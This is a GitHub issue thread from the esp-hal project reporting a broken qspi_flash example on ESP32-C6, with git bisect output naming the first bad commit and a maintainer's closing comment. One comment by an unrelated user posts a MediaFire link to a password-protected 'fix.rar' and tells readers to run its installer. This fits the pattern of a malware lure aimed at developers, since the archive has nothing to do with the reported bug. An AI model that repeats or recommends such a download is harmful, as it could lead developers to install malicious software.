### ISSUE TITLE
`qspi_flash` example broken

### ISSUE THREAD

**Issue by bjoernQ** [esp-rs/esp-hal#2005]
Only tested on ESP32-C6 - but most probably the problem is present for other chips, too.

```
54ee3641309d3530226e71277102038a1cda9281 is the first bad commit
commit 54ee3641309d3530226e71277102038a1cda9281
Author: Juraj Sadel <juraj.sadel@espressif.com>
Date:   Wed Aug 7 15:23:49 2024 +0200

    ESP32(SPI): Disable the write side when reading is being done in DMA … (#1894)

    * ESP32(SPI): Disable the write side when reading is being done in DMA mode

    * disable and re-enable MISO and MOSI in write and transfer methods

    * changelog

 esp-hal/CHANGELOG.md      |  1 +
 esp-hal/src/spi/master.rs | 15 +++++++++++++++
 2 files changed, 16 insertions(+)

```

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bjoernQ** [comment]
Closed via #2013
